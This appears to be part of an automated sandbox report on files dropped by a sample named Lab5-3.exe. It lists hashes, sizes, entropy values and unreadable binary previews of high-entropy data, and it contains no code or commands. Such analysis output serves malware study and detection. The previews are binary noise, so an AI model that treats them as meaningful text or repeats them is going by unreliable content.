                                                                                                          SHA-512:D6ACD967E3F27041C1E7CF65A562FE0C06C42C7F52595BCF4B4AF0025B707A6AEE2EC3C089CA8FAA73BD3F1726C6D2128DCB3C58BE057634735A333B2F228670
                                                                                                          Malicious:false
                                                                                                          Preview:U..3.7..M..7.=../51.<..Gd... f...e..#}.>G.....r.?F9.....i.r...L....>..e.d.9Eb...=.lv.."'S..w.2......vR....`.:0K..&n...sD..8....E...0C."..K< .o5..9..9..K.bn.W..q.P6.;C..9.....9..N....M?^.G8b>...O..."d..!....0..........6<.5..@-p.h...3..<...^:p..L.}.......<.y.0O.\.H'...l.^..0..I....7.t.v..Ej.....K.....s?..2'5..d.m....FI_......O]....W..@.A..TR."~.?.B.~.%UZ...(..P....s2.+%....LU:...Q<}.(U../...AKe.OQ..H;+......Q.U .`K!N{Ne-G....h..*........=..QA.<_3....|G]U..,....!...K..R8...3cv6.at:N.L........FBB...H..C......I......P.a..W3.#.B...yw...;{-!^......L......BZ...|..|.tv.*..+n.`..M{=.I....!....Wa..h..y....._.UM.+......9...[G.....2X..H...-a.d.m.en..7...".,I.c%"..0RV..G....<2.w;a...yg|...d.'...6..%|N..n(.......e......!..6.........9.....G..?rw.5o....+7...~.1.k"c..n.E&....q...1..,....XVA....S.x..D=.`Pt....fb.....o4......"....'...U.c._X..~-.i(...^+1..s....J.>l.......LU.J:....[7.....p.w.G....e.H.^2-..'.....n..........0..~1.....h3.....mYYHW.J.BY.<..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3552
                                                                                                          Entropy (8bit):7.957870612718356
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:80X4E6IS7VfSSbrJeTI/JkcIZ5orbLrMJY9tS8HfUTid3hBaUoSGFcmeykEdEElk:8Y4r/VagrnDE0LDbS7Gx0uKeY2ElUJ
                                                                                                          MD5:8E799B93F4372B4D6250A9AEFA3E3576
                                                                                                          SHA1:7BE8160A7F417313DF7572E5A6D45CFE402F116C
                                                                                                          SHA-256:96DF94D4DE1CEF740FEB7CE8F125ECF2F6B0C6139AB752598EDACC097EB657A3
                                                                                                          SHA-512:A319C4E3DBC1D66A49AF51E9E9E518C368EB27BDBC9983BA2ABBDD2A98DC9296C3DD0701F9829CD4AE4299AE50AFA1B33B05B825C31A1FDEC1473E66114130E9
                                                                                                          Malicious:false
                                                                                                          Preview:.g...G..}K..^.2Y.#.%;...<.G.....|...TRA.P.G1..5.....K...{...2.t.?.....zL.K._.........c8xn.w7.r.(...H.:..7v.>^..H.~/X.y..N+Kw.E......L..^.......*c.R.C'.......4.N^^..K.....r....X.W.`h.~.wf...D...z..W|...K$..<.V.....grW*....3...FO....\...a.[..I{.?=KT.w..?..f.<./..?...+.>.H.......K..}....$J....D...........5.G..r..Q.../.f....<....B"eA.K.....i...L&..PB .LB..?.........*C.n@.....Vb./.2...|,s..x..7.'.l..}O..m.f.....X.....B......D.3O.*........H.l.0.$.e.'1@........8.....I.k.gx.;.+'.:l.1.^H..-6.k{mx;.dT'...V ....{....z...@......4..N..!.Q...ch..rb...)lH......'....,kw~g..0L:"./...,.}.;<....+.$rB.....h..}..b..=..(.* .2E...>....Q..`.....4...F.K..,>7....d.(...2..}"X...j.Y....[.:.^...g.RB.[. .5)c.!G^..>....xAV..v..........n.TL...)+...\...q1;}.e._w..&..l...<N.,n......J.D..z...w{.=bK..R..S....qg.U".U...t..a.z.....cEu#."Z....*.../cw......u...`B6]....J.QS...#.hg...j....3_....\....%.......yL~..V.......+...7,..........$el......F..Ao....h.....+...<....O#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.922924087544433
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wvSMZENaU4cNWtAQOmqm+pd6XnjBO7uZHfUTid3hBaUoSGFcmeykEdEElU92i:waMZy34BiQXqbpd6XnjnaGx0uKeY2Elk
                                                                                                          MD5:738035DB38B672A24E3F8E9AF6E10A5E
                                                                                                          SHA1:454DD396C3120CA2754546A1CFBBF1200CBA888D
                                                                                                          SHA-256:2BFAC17EAC48A370C162166611395F928F2CAD5B709F3E089021AB08E546D3A7
                                                                                                          SHA-512:9D119132C2D1B875A741F1A17AEE0E5463530CD504543ABBF0E41927522CE412A16CAF79534677FBDAF5299A4DE999FEA7B3BA6BBAF11E8D3F470C5064ED7922
                                                                                                          Malicious:false
                                                                                                          Preview:....h....u><...+(@....9.......e....%.].c..D&..AC...-.:Wz.N.n*..Xo.$..f.V!.....z...9..nB]#..@....w.Ht.[..c%1WQ..)pej?....@.....j42.[...m.`.>..9.-!..r.Z`...WI5p.J..b.b...IY.`q".~.%X...<B..s.6....i...h..1j.b....W......b.X.`2)`....,M8:R<%....END.dI8.....I.1...QF....0&\r......Z..._.SQ.~.-B\.?#.ti.[H.nl....9s..K:.......8VP...p.b...b]....6.....x.c.L.9...x.:'>z...;6[....o....TVR.f...}...)q.Z|:5..4M'..U.<Q#...;.X....H2...u..).0...`2$Mzq.;..>6._.V.#S.XP..Q.>...l...y.R..c_...^...t.40...O'...#.G.vh.U...k.6m....... ..d...l<.Q.._.e^..... .m:ta........Z.A...3.....<uK..K1#F.,..bV......@...`oC.iN..6M...(....;0.i5........L..a:.Vnp9>4E>.l.t.....vS...V..1...\..(......|.i..u9..e&86.w......`....M5..p.S.eO..{l{E.$......M../...fpS...~...&...m...&..m......r.{..d6..-V.....W..$".|.U."H...`....Y)..H.....I}..._N.8...qC.^...z.Q.-.G.g.u}%*..q..C..'5..i}bf1..a.U....M.cO...L..............&.[Er.*Wc....]..Y.,..'..s.ai..<. .. Z...W."y.P...ID..?j..i.fdS....\+.-78......v.+.8.....D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.913054135390189
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2vr5QRgoqnA6nZS+E8hHfUTid3hBaUoSGFcmeykEdEElU92i:2z5wUA6l3iGx0uKeY2ElUJ
                                                                                                          MD5:D1B8F372F8A340B616CF61FC3D3A446D
                                                                                                          SHA1:E152469CCC225AE41C0DDCBC8FA158771A03D944
                                                                                                          SHA-256:79D42A46FAE71F7504A524F7173FBF28ED707FCA8FDEFD5A47421E47941392A1
                                                                                                          SHA-512:F7BBD8A4D87B0A40F71286C6E7825834892E2DDCEA6C83412EDD2A922A04FE26A6A44E84FDA9F2C013A29CFABD1A8214DE92ED6096DE6C99CF3A1059CDA663C5
                                                                                                          Malicious:false
                                                                                                          Preview:.=.....[s^.K.e!..N.].dx-Y.eM...`..e.N.>!s...f...X_..].l._|.y.t..H0(.....Fs.C.Rs.._.$9<..[8.!.....;._..:~....<.f....QF.$........a./...uZ....u....d......I..Q`....d.u.W.......U.3.......n...M.L..o......d/y.DPU%......)w......C*z..#2.D.J..e~...eBz....o.......".J..........oF..V.m.*,A..%K.....%.1w.... .`......;_......V.........o...Wg..D....l..s$......X.1s}_ZE.h.....@.%Z.|..9...2(....6....3..z.Ub..`.^./..bi4. (.."a.X...e.c.:.+...3...&......B..WH...9..P]..|l:../....}...?z. ..6VH...'........eF....o.As....f....5...5...k*_oN. a..p.o..2.aN...S.{...I.'.... V4....Q....~.%<.`P-...Y.1.P=..xO:..R..xA.+.^h$..{.#.....73M....\.>....wZ...{.g5c/...%.4.......R.....&...=E'..Iu.....y.L>0......'.Gx._.(.j4cGK...*..2..T..Z..].@.6...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.9435755621463695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TFRRq0f+UblHu9SDDIn1WVoowXuKGBHfUTid3hBaUoSGFcmeykEdEElU92i:TRq0f+gKuDatdOCGx0uKeY2ElUJ
                                                                                                          MD5:00D1D492C6B31EF03F15BA0E7B838BB0
                                                                                                          SHA1:D17687D7EB857027127857E913A42F2BC77A0B65
                                                                                                          SHA-256:47F430F553FBEF9E2C86ABAC328607812CA05F2878B63B219E05C55E00495142
                                                                                                          SHA-512:5F27ECC0AAE7F5DA0D4D38795967E6B504D4D6B1586DA92CFFB2397A6BEB82688C2FCBF82EBC92C0E469FF20A53471670FB4DB70FD1A83C24E1722B445B7E65A
                                                                                                          Malicious:false
                                                                                                          Preview:ow@.cM..p...>.PB..(.y..F..K...rd..V.....U.K..GB.........y.S....s...P..aB'.....[Hc..._.C.Nb....]....._*-,o..w.\.=..0.N.v.-.Y.....{.i>(uq..W.......F..Y-d.p.])I..v......k7....{....9;...e...cN8.....E].v.=.....f.o..K..m..R.]....|.p.b..W.........Z......{.........w&....|.m....."P.p.3....C.\f.^..JA.a. .i.W^2.p....L.P.h..H;.;c....,.E!.z.a..M.?....d...6T....g$A.mg(N3..\.....n..3..%.n9i9v...$.[.}/s......S)$+a..L....S.h... j.n...x.,#.@~..I..gh$G.<$...q..8..l_....1...E_RO..>i1$.C.^1..~`...&...5..*K....E$M....h.Q.."._.>.t.V.A......d..%.....S..$...[..>....t...o:...../[J8....rX.e?.....n..F5o>.........exU.HUT.......3.p.C..J./.2.\&.L...zNf...cw.o..\..lB(..Ur...7R.d.Fx36x.......:..8.DW.C..-...'..m.`h]YS!..:.....x.....0.%o..n.+...l...H....H.Q.b.L7t..U...V.$..l..{...K.U./.\\Q.R-........!.......m&...r.|.....C6:..l]Y.t......F)......}s.....(.'.K.'`'..:.(.....X~...GI.2.n .P.x..W}..+.O-E.3.X.9.+....<....Wv......N...)..M..%.t.......2.x..Y\c...k..Q.L.|f.4.F.;=$X.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2032
                                                                                                          Entropy (8bit):7.903193200296501
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VKP2zdUuqzencSYOBjHfUTid3hBaUoSGFcmeykEdEElU92i:8P2mencvOBwGx0uKeY2ElUJ
                                                                                                          MD5:E939D3BA03FD4DB7BE6F2FAA094DE5BD
                                                                                                          SHA1:0ED6684F6160F17BE943F15326AEA9541904B351
                                                                                                          SHA-256:647BF54EA93AE6E77598742D9FA2EB983F1D33FA7C8AF9841EB4DD6EDEBAAEE1
                                                                                                          SHA-512:FFD684293A066CD323A23F5576307AC3CD3FFAE7FBAC41CF8F6794A5E89E34E16AC7F3DD4A0BE4BF1B46E47D05B193D261E5F6FF639CB6CCFA8BEBE0F8037274
                                                                                                          Malicious:false
                                                                                                          Preview:C.e.x.w|({....A1.F..]I.j.:..;~...Y..W.z.8...sdO.5P.J..n..v..n....?..?.H7d...$...}....tC.F.R..\B.8n....../oY.......a.J..G..k....1.....`..Vy.e...?y.b....d.J.......CQ.Z..T......L..kB..z..U.D.B...4&.M..G#.2..}J..W.-...c....xI.......U_o.Dlr..=.U....^...7`.32...R..;/..j...I.) E....~VL...pt..BM...>1.B.E4.m...._+..\.....:..0....k....*".UVG..7~...6g.l(.~.-r...._`.........m.N...Mf{.....E..W........Hu.b..T..._..-i.i.2..v5.O....H.....W]WL.8..4\\).-....{(......F..wx.x.......VJ...6pnX....8hU.#....u..{k..A.a.q2..!..cc.DD.P..u...'.....u..r2v..z.1j....5....?....\uz7.....S.-..K...L.).........{P...'y...2......h,.E....Z.^i.....U..r...{^mz...m.1.P4.......=...3..H#-E.(B!....N..f.g...-..+......'.~n..m....Z"M..[X...q..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.944340540806437
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SXRX2RBEkvwDqdhNu1P/BxUEalDT5/nlrjmJuwo6Et3c3HfUTid3hBaUoSGFcmeR:eRmRBPHu1hz+xh9xGx0uKeY2ElUJ
                                                                                                          MD5:49C838BB9B3FEF889C514F976AE1A198
                                                                                                          SHA1:4A4B5102B689069C32DA34EC878B7E6569AE6A12
                                                                                                          SHA-256:7410E91E024E19441DCDD19EBC126A6AE0C1273A94E2D43CE053722831CFFBBB
                                                                                                          SHA-512:D6753C35ADFAD486E88A095ED3B5EE30212F579C46E6A61A36E39E03EF961AABF4C6FEF46D238FD297B234D53D777D306D231ACA23D652AF2E0FE708C2E6515A
                                                                                                          Malicious:false
                                                                                                          Preview:....Z.B..1QI.ZLC..E......5?..o.5..A.Y..~8...&W...J..}.`...q....Y.;...2e...,..>.k..W..;:>....y..[...2....0.x}.(L!....BU....,Vi.4E.l..!.J..=.B.]t......7..CA.. mc....?.0..h....$7...../(l...k.@gMc...VB1..0|."q..F..t.r..1E....T..CD..D.2..6Q.......p:|c...,...AQ..d..;3..^.8.pB;?..."*....t>...m.g...y.8......}.ON...+\..D.}<....3..Q....A...9../..:)...dr*......2.Du.y...6Wj....D.p\S1.?..<R!P".a.z....l|.L.t.e..*...hq..|.97p..&X.s."U...G.......e..o:N.m...uH}...Mc'4......X...(Zw"2...(...E.._,..?.ljc.!...%:u8.i....y..`aa ^6.m..E..Xg...t./.9.......S.7Cx...|.H.`..(........<-.h. 0t.h...]'d.......>.Fo~D...~............n..d.|.y.X...R.@d.W....:G[....rCZ..UB.G...A.x...`.|...p5I.wt.6..s..!X'..C.a.p.WW...|....Z'ju..i}..5.'..Y......a2.9....).>q..>... ...; ..f...:..9.1.%N.....W...(E.).[*...ry(.m.]..\..)T.8j./..:..cg.bO=p._.o.@....:.JZ..B.=......#R7...W.A}7.Cx....1....K7...w.e.-.[.UU]....?......Z....P/@......Y.":../.U.]..=.G.....JN.A.z.......Z.Ewn.. ...".~]..s..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5264
                                                                                                          Entropy (8bit):7.967274024641127
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:hffgqOnbgfJse3FkzEO3K9/zAsB//9xSJMMdEteac9VGx0uKeY2ElUJ:hH2g/O3KWpZdE18O0Cb
                                                                                                          MD5:A5112580A3A95DD87F5D752808DB865F
                                                                                                          SHA1:15B86EFEBD3298B46B4B673C452BE1A04FBB14D9
                                                                                                          SHA-256:DFF099DA23C1566717DA49CFA9525B176D378C6BA364E0251C58AB1338C23715
                                                                                                          SHA-512:C87D73C9E6FEB0688288E71EB1079EF5AB880F85F9270641A10AA110ADEF42B295F3F37FBAE0D9A40C4574589F804A8915F6656DEBA38F3CB6CF1D911E6FC55C
                                                                                                          Malicious:false
                                                                                                          Preview:...O.LN*..Dt&.+F..,a.T605.!..PpC.J...n..[..........[..]..E..*.#.R.c..._.8...jX4wJ<,~....K].d...#q... ...^.CN..j......f...... ~.....T..]..<.\...>&.Q.qhb...1..).....W4.F+..,f>..=.....<..;..J...6.+.f"u.H.0........3N4.a....1xN..... .6.>k.=@=0`eg.odo%..l.2..Ms..A1......%N...S...2.HsQ....Z.<XIs...z......^.r....).8u...[..8..1...r..D......k4.Xu.x.r....a..wR......ZL...c..&.yX]..(...d.3%.p.K.;.O7D...9vZ.F..g...z...;....dl.G)%....p._.I..m...6@....d.l.[....xb..G.B...Rz.f.;..OS.R.7#...{.. ....r....y'%q.H...&..=4GC....n.~.W6...EI+.....Q>.<...{si.u..<.<?i..d.y.-.)e..\>PW.B,DDX.....]v.............x.u....*...U...cd.G.c..[.. .0..Ms.C...Tmxv.&.v.>R...$...M.Sa.!.r*.7...5.e..{....<...F....7..c..m..o...&)A.}.JW5...4..."..@...K.+..uW.....H+.H^^.B.6k.3...F.}.y...<.....e...z...z.........EBhi.W.J..3/.&.....r4.m._..u.-1T.r..]I..T.....e...U....K.[Vtbls...!|.X.<&.-...P....H.iE.BM......Ot~.Q5zW.?....F.EU./...9...*...).c...n........4.;"Do.DeX]Iq9.k....ihA..+.m.T.....y.p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.910056142675206
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LJy/q0pyv0oWYl7oKtPHfUTid3hBaUoSGFcmeykEdEElU92i:0/DBYirGx0uKeY2ElUJ
                                                                                                          MD5:3F1F9041F6C3DE757F9911B755359843
                                                                                                          SHA1:2290039491BF835EA630E32A7D0D3ED336CF482E
                                                                                                          SHA-256:6152260D96F1F1E000227DD6BFB3D589B9389B29A7E5EF06D9340B97D9D352AE
                                                                                                          SHA-512:73318F19AB788CFBAE2574134E6178629EF53DF7B4F7F237720C3E3A1E9B1B0BC3897F1B96906194E9FB6D3586D746C26281E5D2CF7A4EABC106D9F143EED854
                                                                                                          Malicious:false
                                                                                                          Preview:1......[.}..P..9...k...g.......6 g...fuR.OE......C%...m.....XE5E.$C...E..8.5N\M..........z..&..._5....N...|.{p.f..F.2..b..R;ax>v...!.!rx.X.......,".*w#Q........&.._.g..6....D.60|...'E.x...L%....e.#...(...U2+.[..=|.6...d)2.P.v.1.....}CA.....).]./.,BP..#.?tJ....}.J#.............6..]ja.Wn...%_b..Sg....?P.HEQ.o.E"...T.c...M..y>U.D......../:L.(hl..G2(R.(.....E...u.@..l..N.7\.?.O........H.d`.N....a.9D{R.GhLX.....Q...h.Z{H........]..L..w... -jD.....Kb...#`...._....nr.pza.....:..A.J..N......qjh..^.=..{..9k...@.......;fZ.^....d..i..9...Ha.:.@...d.Lb|...&...T.i...Bx.M....?............Q1O.FgR.........y...f..`.?..vCQ ..K....S..#M.d..R.sh.>...&.x..0/L..J.|.W.J.....3>yKs]-.A.......e4.|.8...HR........M.....R..D..!...S....s..}..a.p...2#3.RVk...>.iT..OW..~....S.tLv..b....t;.....v......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.910582677933017
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Hl+hl82YqgWdQHfUTid3hBaUoSGFcmeykEdEElU92i:HlqlV5Gx0uKeY2ElUJ
                                                                                                          MD5:DDFBA5CC5F0149B7103EBD5567776D46
                                                                                                          SHA1:780886EF3B5CC7BFE0CECBC5129930892F821258
                                                                                                          SHA-256:BFB91763B76813129D75C5AB395DA74F4437CEE6C568CFEB31E16DAB17720B40
                                                                                                          SHA-512:6DDCB540D81359B6F1502D5F9BC84332BA0C51AC8F0A45A14166062D14A0AF38F6D00BEA3C2E5A9A30350A8EBD7307DF23C373FDB2DD0ECFAF472D3A377DE2FC
                                                                                                          Malicious:false
                                                                                                          Preview:4.....l...._}o.=..g..{h.]...,|.J..d.>kg.Q..2}r.jSGa.6G.aP...-.l.a..g..:f.&.L.......oZ...HU,.7|>.~._...l........Ru..Z.li.p..1...#...uRu.c_.').....mi(9A..y........V.r4..........PB..kb.0.n..s.Ea.N.O..K...#.7...b.#../F.r..7CZ.....g{...:C%..|)..<8&.....8...|2=q........2z.90.;.....Q.$/.u.j.....Y...1..R.A..0^.M[...$fLh.......zyL.u....-C.v.F.............F@.N..w..K.._./...)6..zc._d7Us.r.)S...s...e.x..i...89.2L<.(.S.f..._....B.x...... ....F.......L]..|E$uf...c...3f........u..8..k.`..|..v.7....FPE_.."w.3..p;.P.$.-.*Z_....=..D.$......@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6336
                                                                                                          Entropy (8bit):7.971422400533482
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:I4jZbQL0RWuRVspJ8br7VEBBu8nOBh2PEjsuKBx9uW0yWibGx0uKeY2ElUJ:Bxs0RPmJ8r4g8OBh2PEgfuWPi0Cb
                                                                                                          MD5:E5D606CDD2852B1C13D374A2F86106F4
                                                                                                          SHA1:DF807CC0608A2154E989E2126D12254678D1F944
                                                                                                          SHA-256:30076FD559645EFBBD89CBB7ED55FBD53A2D366BB73B42BB694B07ACF73A5F27
                                                                                                          SHA-512:E3E4B0E99944EE15BCBEBB84FCB28C78D8724789A82F7F360FAD8B26CBC126D1806F171A6A5DAC55EAABAF98954325EC784F0A9FFE96D73A209492E5C6DE9103
                                                                                                          Malicious:false
                                                                                                          Preview:K....3...F}T.V.&."a.h.SN.9"..F..{:pF.{.....Q.QJ.P.K..X.El1...A.%...r.a$..iX^..)....Q|A..p..Ry..J.>V4._...5G...L..C.Q2.<(...d.....Yg...M......2.(1..s...J.[...s..&r....I..Wm).%|tf.....{....W.6'z1.|].._..a(..,..*".[.(%.K......~~....r.l....1}.2ku.t...M0...AO. A..LE.)....oY......>..j.......R...].]:E.q......j&. ........a:.[..RW^.q+QAP..H.X@........C..m. VA...u...s.....^.....SM.t.C....-...-./n....._M#.z.+..S.....x.%#/..b..I.g..5.U .C..|=..(.ov.q...{..)...C30..M(.;@v^.L..........F.8..Q.5o5v._.L/^s5.W......6F.W....|zf...G>siI..O\..t!Z..?....T.......B.....[R......l...e.8? B3.X.1..4).n..........x......!.....v.t..qP....w......\..R&.5..$..6~...t...{..j<..x.U.......\z.Ni.-..\..C...Xj..u..d....S.j...P..n..5=..3...B.-...%....M.;.;.k.....%pt..<X+.$.....h....b..&.V\w..49...Z.VK.v.#..9Yb....E:..,...~..I.)..5k.....c.w....k.g5.W..8...h...[.tq...N.a...i*W".1l.UR..R.8...2..O..!..5.......cpl........."Gm.....R.C8V.@.)..i.7.G."..x...P.^&......$.@f.Z...Y..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10608
                                                                                                          Entropy (8bit):7.9824194271011875
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:0ElYxclLGkI4MWTS/1BA5GFafdjWYVVztbCoHL4E7r+w0Cb:Da09O/1WYFafdjWYV/eurttb
                                                                                                          MD5:1A9A918DA94F4A39147751299AEF7A17
                                                                                                          SHA1:16188C30E6CB7BDF86B3CCC0AA2EF4682649B919
                                                                                                          SHA-256:1665F306AADC31C4F7F8F286F32EBCC923C2BCE4EFC8F54098F88936F53B19CA
                                                                                                          SHA-512:4AFB44BDADCD5483DE69FCB08FAB59DE49E1EB9389B9FD36A4D95002163F76C6669718B5D8B6C29642190C5B3B48685BDD1C70ABA93693673B179109A4DF8684
                                                                                                          Malicious:false
                                                                                                          Preview:?...Oh..$..ip/?.Z#. ....;q.......*-L...x.e..XJ....n'P(....Q:cYi..H..#.......&g.SaI.{..Xr.T..,7.........H3V..3.,MTf.b...g...>|..CD..'..!Y[..".J.JF.mq+S@..#..........-...D~1.....*&..Y.`..Q.....}...MN......D.i.jv._......X4m..=.6.....#S.,,]..3.A <.........z..v.8Q~.f<...G:+...*....V)e;yR(0..S.f|i(..'@...jU..@..5..*......<...#/..F.|.~..8.b.)........v$@...[..Oo.......;.po.,..S.k..X..}...F..sg.)..z.."H.D.U.K.D...:.P.....d..)..->..R~.....%....zJ\..#..Z.08.....k*..A...f..5.....k.I'z.r.).f(L.>.|.l..l8....<....@.lcw..P9.0F......K........A..%`..1...w.PG.H04D...9...QzUR.....Z`#....<q..../../>L.[..k..3.<L..........f....6bC/.._.....u.IN8.(..j........f...|4...15..=.....~.-......".<D.=..M$>..P..S......G..B;7.N.|.6...a..9.I..7...~8.....>\....Z~r..5.Wq'...-.v.....(/.X.....]...S..#i.:z[o...M~mGK.l..[..'9..~[.c.G.4V..7._.V.v...,D. .~..~....x..hg..`|..E..q.as...v..$.{..0...+......t..3.A....=.=H@N0.T.+En..=.D.b.n...r:..1:d.#..P-..%.b6.....m8.....-4.k..^B.i2...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4320
                                                                                                          Entropy (8bit):7.9601480301713465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:VuBAK4CUn12x2Q/xqkQXz8IhotqeVXHCDSFGx0uKeY2ElUJ:VRK4CU12xl/xqkQjlho/JCx0Cb
                                                                                                          MD5:F7798BD61012DCE08C590C7FAB637B84
                                                                                                          SHA1:57B8C53723DF166B8B9BD2BFB64CFE44AC3261A9
                                                                                                          SHA-256:4C13FB4283D61667AB1072177308CCEC110E86EB4B217C4D9208ECAA465ED3D0
                                                                                                          SHA-512:C716AEB6885FFD3E15832A31044BDDEAF276458E6E3C226DA488DD21333FE1231DCC829CD1A006F648EF5C14FFBF887A874408A9A48B0FCF5D5F36D6CE28FF08
                                                                                                          Malicious:false
                                                                                                          Preview:.....s.".9lY.o.i......Vp...hA..."33.F........"q....T..K>.6M...e>m.y.1.Ja.n.K....xxw.g.9H....?.+...;C+.5oz5......pK. .R.l.k9..r.(.....a...S.........Q.b.=..mV...[..GRW..;p..n}9J._..Bv...`&^P..]u..(LK..~...b.A~..~fP....L...`.B....=^..."..]\w.).&.0..........4...V.f.......Fvn....<..q`t,...G+..M......[.$.A9.<.v....*....U....A.:NH........>..." 0W.k&.~....M........}.=7q. .jm.J...2....f...:...F.......F.3....F.m.X{*.z..$.o"(.+.?....."..&..|(G=E.Sb.a._.Jt.No.z.!..X...8.d.7..R1...K...fLl..2..g%.V.m.e.O.D.r.l.9L..D..:b.....A.......<x5......Hg.......B.VC...2....P.>.L...l..(.}c. ...Y........=~.;`..3.?.=...=m..8..^EC.\.t..:6......9.y.-.y.An.d......!si........$.............6`r.84...%..u...x....}.D.....j......:!..s.....<.23B.*mD...G".O@...n....-X.....G.[8@F.....p}.l............7..6^.....ZpOG..@..U..s.e.#l..(..l.lv..-....N..}.,..h.J.{n.....Va..km1.K.3..w:.3,+..>\6!.....Cf..q...Y.Y\+.u...n.".L.k.y...........~$Hm..tUV..}...Q2..........]F0|........4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5280
                                                                                                          Entropy (8bit):7.965690913288104
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:tvF9BTcPQPXb0Xt0j1oMA5x+wKIF2uBjq7Qoj/9k+coGx0uKeY2ElUJ:tvFEQPLa0JrA5xxF2ukxj/u1L0Cb
                                                                                                          MD5:1AEC7CF48AC16939869B82A238E7E485
                                                                                                          SHA1:34EC664E867857FA76765D30100EF6835335DA24
                                                                                                          SHA-256:3E927953B6B22A8250C3EF56DE049E8370C6A1E889737E2666E9CD39AAA6AFB8
                                                                                                          SHA-512:401A834C2FA34218FA790102B2F23FABD006E60E9CDAE6BA99FE74C49AAC617CE8C13EDBD4960900E285194317619443ADC653B6B6CCA003F3A6F59B06BCE327
                                                                                                          Malicious:false
                                                                                                          Preview:...=geh......*.+....9T..r..Q..$1.M.BI.... ..D.n..;$..o........zdV.r..!.........,..j.2...gV.%.*..nAL.];.8.sF..Ra..<...H.C..}...{.Qm..Fs..^U..t,D6h#./.xv.^....S...4..<.[...b.........x....#..z..Yz..L....h.$Xe.p:.o.!...4.q`/.~.j..Iu.@.]sH...I.....a%P.5....-0R.5.....oT.GL.tD...~a...(xW./.P0...LqLH. .J....Wg.,..... 1.!?..Q...d....y......*.._..q..}7...=B/Ad.n$.....W:..u........_T9....l.....^..r/m...t...67.i....OQO..$..<..2.#d..b^D..9Y.~....Y<....b....}.:.8H....rd.*.xw.%...*...G`.....T5..&m.b....G....f..l.J#..l.f.?q..Ul.L......f...a.........Ig...q...m.z;.s.......\h.O..g..\|../s,s..K...E.W...R4@8..Y.b..}$.......S+9.K.r.K4.v....uu.....n..j.3=.y.5.c......^~.i_.@.....0..{/...X..h...#..3.Z.?l<.cu......N=..N"`...FzP.....~.{S*.c-Xa....O.>~m.....g.......o.YZ..hcV.,e......!+..[.......D(?..O...4W....N#e.).ng.$..w.5._.....+W.0Q..}.".z..T......<..Q.u...........>..%a.gI..:....Ga...u%.A...d...ee...+.&......l.K=......~<....F.rKCy.H.Q.`e.....u..VI...A..
